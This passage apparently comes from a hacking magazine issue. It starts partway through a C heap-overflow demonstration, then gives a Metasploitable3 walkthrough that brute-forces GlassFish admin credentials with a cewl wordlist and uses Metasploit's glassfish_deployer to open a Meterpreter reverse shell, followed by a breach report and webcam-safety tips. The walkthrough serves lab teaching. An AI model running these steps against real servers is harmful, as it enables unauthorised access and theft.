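        if (command_after_unsafe(len, "")[0] != '\0')
            return len;
    return 0;
}

/* The fix: read at most cap-1 bytes and terminate, as fgets(buf, cap, stdin)
 * would. Returns the command buffer, which stays untouched; `truncated`
 * (if non-NULL) reports whether the input was cut. */
const char *command_after_bounded(size_t count, const char *suffix, int *truncated) {
    static model_heap h;
    const char *in = make_input(count, suffix);
    size_t n = strlen(in), cap = NAME_ALLOC;
    model_init(&h);
    if (truncated) *truncated = n >= cap;
    if (n >= cap) n = cap - 1;
    memcpy(model_name(&h), in, n);
    model_name(&h)[n] = '\0';
    return model_command(&h);
}

/* Live counterpart of the address-printing version of second.c: distance
 * between malloc(10) and a following malloc(128) on this allocator. */
long live_malloc_distance(void) {
    char *name = malloc(NAME_ALLOC), *cmd = malloc(CMD_ALLOC);
    long d = (name && cmd) ? (long)((uintptr_t)cmd - (uintptr_t)name) : -1;
    free(cmd);
    free(name);
    return d;
}

int main(void) {
    int trunc = 0;
    printf("35 C's, unsafe read: command = \"%s\"\n", command_after_unsafe(35, ""));
    printf("32 C's + \"ls\", unsafe read: command = \"%s\"\n", command_after_unsafe(32, "ls"));
    printf("first spilling length, step 8: %zu\n", first_spilling_length(8, 64));
    printf("first spilling length, step 1: %zu\n", first_spilling_length(1, 64));
    printf("35 C's, bounded read: command = \"%s\" (truncated=%d)\n",
           command_after_bounded(35, "", &trunc), trunc);
    printf("live malloc distance here: %ld bytes\n", live_malloc_distance());
    return 0;
}
```

Compile with gcc -Wall -o overflow_model overflow_model.c (file name assumed) and run it: the unsafe read leaves "CCC" in the command buffer after 35 C's and "ls" after 32 C's plus ls, the probe reports 33 as the first spilling length (40 when stepping by 8, which is why a coarse fuzz is followed by finer steps), and the bounded read leaves the command buffer empty however long the input is.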
METASPLOITABLE TUTORIALS
Hacking The GlassFish server running on port 4848
In our previous Issue (February 2020), our readers have seen how we gained access to a Chinese web shell (Caidao) and took control of the target system using it. You have also seen that we gathered some information about the services running on the target. The information we have includes that a WordPress website is running on the target, other backdoors and credentials to the MySQL server running on the target. However, the services we collected information about were not accessible (port 3306 is not open, port 80 is running IIS and the other webshells cannot be accessed).
# nmap -sV 172.28.128.6
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-12 04:10 EDT
Nmap scan report for 172.28.128.6
Host is up (0.000985s latency).
...
PORT      STATE  SERVICE    VERSION
...
80/tcp    open   http       Microsoft IIS httpd 7.5
...       open   ssl/...    ...
...       open   ssl/http   ...
[further port rows are not legible in the scan]
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?n...
In this Issue, let's target the Sun GlassFish Open Source Edition 1.1 running on port 8080. GlassFish is an open source application server. Both ports 8080 and 4848 are used by this service. Port 4848 serves it over a secure connection (https) as shown below. We have been postponing hacking into it because this needs credentials and the default credentials were not working. But today is the day.
Metasploit has many modules related to GlassFish. But for now we are interested in only two modules: the glassfish login scanner and the glassfish deployer module. The first one is for cracking the credentials of GlassFish and the second one for deploying a payload after we have the credentials.
msf5 > search glassfish
[Screenshot: the matching modules include auxiliary/dos/http/hashcollision_dos, a "Path Traversal in Oracle GlassFish Server Open Source Edition" module, a "Java Applet AverageRangeStatisticImpl Remote Code Execution" module, auxiliary/scanner/http/glassfish_login and exploit/multi/http/glassfish_deployer.]
msf5 > use auxiliary/scanner/http/glassfish_login
msf5 auxiliary(scanner/http/glassfish_login) > show options

Module options (auxiliary/scanner/http/glassfish_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             4848             yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
   VHOST                              no        HTTP server virtual host
msf5 auxiliary(scanner/http/glassfish_login) > run

[*] 172.28.128.6:4848 - Glassfish is protected with a password
[-] 172.28.128.6:4848 - Failed: 'admin:metasploitable'
[-] 172.28.128.6:4848 - Failed: 'admin:Vulnerabilities'
[-] 172.28.128.6:4848 - Failed: 'admin:Privacy'
...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/glassfish_login) >
It failed to get the password. No problem. Let's create another wordlist using the same tool, but by changing the value of depth and keeping the minimum length of the password at 5 (earlier it was 6). We did this assuming the password to be of the same length as the username.
$ cewl https://github.com/rapid7/metasploitable3/wiki -m 5 -w /home/hackercoolmagz/m3pass2.txt
[cewl output not legible in the scan; the new wordlist is then set as PASS_FILE and the module run again]
msf5 auxiliary(scanner/http/glassfish_login) > run

...
[-] 172.28.128.6:4848 - Failed: 'admin:included'
...
[-] 172.28.128.6:4848 - Failed: 'admin:needed'
[+] 172.28.128.6:4848 - Success: 'admin:s...' [password cut off in the scan]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/glassfish_login) >
Now that we have the credentials, let's load the glassfish deployer module and see its options.
msf5 > use exploit/multi/http/glassfish_deployer
msf5 exploit(multi/http/glassfish_deployer) > show options

Module options (exploit/multi/http/glassfish_deployer):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   APP_RPORT  8080             yes       The Application interface port
   PASSWORD                    no        The password for the specified username
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      4848             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The URI path of the GlassFish Server
   USERNAME   admin            yes       The username to authenticate as
   VHOST                       no        HTTP server virtual host
After setting the options and executing the module, we get the output shown below.
msf5 exploit(multi/http/glassfish_deployer) > run

[*] Started reverse TCP handler on 172.28.128.3:4444
[*] 172.28.128.6:4848 - This module does not support check
[-] 172.28.128.6:4848 - ... authentication failed ...
[*] Exploit completed, but no session was created.
msf5 exploit(multi/http/glassfish_deployer) >
The first thing we get is an error saying that authentication failed. On observation, we noticed that it was an https service. We need to set the SSL option to true. After setting the SSL option and trying again, we get an error again. Now it's finding it difficult to select a target automatically.
msf5 exploit(multi/http/glassfish_deployer) > set ssl true
ssl => true
msf5 exploit(multi/http/glassfish_deployer) > run

[*] Started reverse TCP handler on 172.28.128.3:4444
[*] 172.28.128.6:4848 - ...
[*] Attempting to automatically select a target
[-] Exploit aborted due to failure: no-target: Unable to automatically select a target
[*] Exploit completed, but no session was created.
Let's see the available targets as shown below.
msf5 exploit(multi/http/glassfish_deployer) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   [the remaining targets, each a "... Universal" build, are not legible in the scan]
Selecting a universal build as our target, we also need to select an appropriate payload. After setting the target and the payload, we run the module again.
msf5 exploit(multi/http/glassfish_deployer) > run

[*] Started reverse TCP handler on 172.28.128.3:4444
[*] 172.28.128.6:4848 - ... admin:s...
[*] 172.28.128.6:4848 - Executing /lwslpsrBi...
[*] Meterpreter session 1 opened (...)
[*] 172.28.128.6:4848 - Getting information to undeploy...
[*] 172.28.128.6:4848 - ... Sun GlassFish Server Open Source Edition ...
meterpreter > sysinfo
Computer        : metasploitable3-win2...
[the remaining sysinfo rows are not legible in the scan]
meterpreter >
DATA BREACH THIS MONTH
Email.it is an Italian email service providing company. They provide both free and paid email services to the users. The company boasts of about half a million active email boxes.
What?
Data belonging to over ... has been exposed over the dark web. The worst part of this breach is that each and every scrap of information associated with these free accounts has been exposed, apart from their usernames and passwords. When we say every scrap of information, we mean the information in their mails, the SMS they sent, their security questions and email attachments. The passwords are in plain text form and it appears the company stored them in that form for two years. Apart from this, the source code of all of email.it's web applications is part of the breach.
Who?
NN Hacking Group (which even has a twitter account) is the party responsible for keeping the stolen data for sale on the dark web. The group announced that it hacked into email.it's servers in January 2018 and even presented proof for its claim. The group states that hacking for ransom is their common modus operandi and they put the data up for sale only after email.it did not respond to their ransom demands.
How?
Although the group did not reveal how they hacked into email.it's network, they said that email.it was the easiest for them as it had the worst security compared to their other targets.
Aftermath
Email.it admitted to a data breach and informed that it had secured the network. The question that comes to the fore is why email.it didn't notify its users or the relevant authorities about the data breach if hackers were in touch with them since January 2018.
Hackercoolmagz's Take
The data is already available online, and the company securing the network wouldn't make any big change. Also, the company may face heavy fines due to its failure in reporting the breach. GDPR says that breaches should be reported within 72 hrs of their detection.
ONLINE SECURITY
Hackers Can Access Your Mobile And Laptop Cameras And Record You - Cover Them Now
David Cook
Lecturer, Computer and Security Science, Edith Cowan University

Whether you use Zoom, Skype or Microsoft Teams, the webcam on your home PC or laptop device has probably never been as active as it is during this pandemic. Most of us have a camera built into our phone, tablet, laptop, or a desktop webcam we use for work, study or virtual socialising.

Unfortunately, this privilege can leave us vulnerable to an online attack known as camfecting. This is when hackers take control of your webcam remotely. They do this by disabling the "on" light which usually indicates the camera is active, so victims are none the wiser.

Many of our device cameras remain unsecured. In fact, research has suggested globally there are more than 15,000 web camera devices (including in homes and businesses) readily accessible to hackers, without even needing to be hacked.

Take a tip from Mark Zuckerberg
When your laptop is turned off its webcam can't be activated. However, many of us keep our laptops in hibernation or sleep mode (which are different). In this case, the device can be woken by a cybercriminal, and the camera turned on. Even Mark Zuckerberg has admitted he covers his webcam and masks his microphone.

The number of recorded instances of image captured through unauthorised webcam access is relatively low. This is because most attacks happen without the user ever realising they've been compromised. Thus, these attacks go unaccounted for.

It's important to consider why someone would choose to hack into your home device. It's unlikely an attacker will capture images of you for personal blackmail, or their own creepy exploits. While these instances do eventuate, the majority of illicit webcam access is related to gathering information for financial gain.

Say cheese!
Cybercriminals frequently attempt tricking people into believing they've been caught by a webcam hack. Everyday there are thousands of spam emails sent in a bid to convince users they've been "caught" on camera. But why? Shaming people for "inappropriate" webcam use in this way is a scam, one which generates considerable ransom success.

Many victims pay up in fear of being publicly exposed. Most genuine webcam hacks are targeted attacks to gather restricted information. They often involve tech-savvy corporate groups carrying out intelligence gathering and covert image capturing. Some h acks are acts of corporate espionage, while others are the business of government intelligence agencies.

There are two common acquisition techniques used in camfecting attacks. The first is known as an RAT (Remote Administration Tool) and the second takes place through false "remote tech support" offered by malicious people.

Genuine remote tech support usually comes from your retail service provider (such as Telstra or Optus). We trust our authorised tech support people, but you shouldn't extend that trust to a "friend" you hardly know offering to use their own remote support software to "help you" with a problem. An example of an RAT is a Trojan virus delivered through email. This gives hackers internal control of a device.

Total Access
When a Trojan virus infects a device, it's not just the webcam that is remotely accessed, it's the whole computer. This means access to files, photos, banking and a range of data. The ability to install a RAT has been around for several years. In 2015, a popular RAT could be purchased on the internet for just US $40. The malware (harmful software) can be deployed via an email, attachment or flash drive. Those wanting to learn how to use such tools need look no further than YouTube, which has many tutorials. It has never been easier for hackers.

Webcams are everywhere
Our homes are getting "smarter" each year. In 2018, the average Australian household reportedly had 17 connected devices. Let's say there's one or two laptops, three or four mobile phones and tablets, a home security camera system and a smart TV with a built-in camera for facial recognition. Add a remote video doorbell, a talking doll named My Friend Cayla, the drone helicopter you got for Christmas, and the robot toy that follows you around the house — and it's possible your household has more than 20 IP accessible cameras.

To better understand your vulnerabilities you can try a product like Shodan. This search engine allows you to identify which of your devices can be seen by others through an internet connection.

Practise 'cyberhygiene' at home
Placing a piece of black tape over a camera is one simple low-tech solution for webcam hacking. Turning your laptop or desktop computer off when not in use is also a good idea. Don't let a device's hibernation, sleep or low power mode lure you into a false sense of safety.

At work you may have firewalls, antivirus, and intrusion detection systems provided by your company. Such protections are void for most of us when working from home. "Cyber hygiene" practices will help secure you from potential attacks. Always use secure passwords and avoid recycling old ones with added numbers such as "Richmond2019", or "Manutd2020". Also, make sure your antivirus and operating system software is regularly updated. Most of all, use common sense. Don't share your password (including your home wifi password), don't click suspicious links, and routinely clear your devices of unnecessary apps.

When it comes to using webcams, you may wonder if you're ever completely safe. This is hard to know — but rest assured there are steps you can take to give yourself a better chance.

(Article First Appeared on theconversation.com)
All your doubts, queries and questions about ethical hacking and penetration testing can be sent to [email protected], or get to us at our Facebook Page Hackercool Magazine, or tweet us at @hackercoolmagz.
SOME USEFUL RESOURCES
Check whether your email is a part of any data breach now.
https://haveibeenpwned.com
Get vulnerable software discussed in this Issue.
https://github.com/hackercoolmagz/vulnera
Tweet to us: hackercoolmagz
Follow Us on Facebook: Hackercool Magazine
[email protected]
Our Blog
https://hackercoolmagazine/blog
Visit Our New Website
https://hackercoolmagazine.com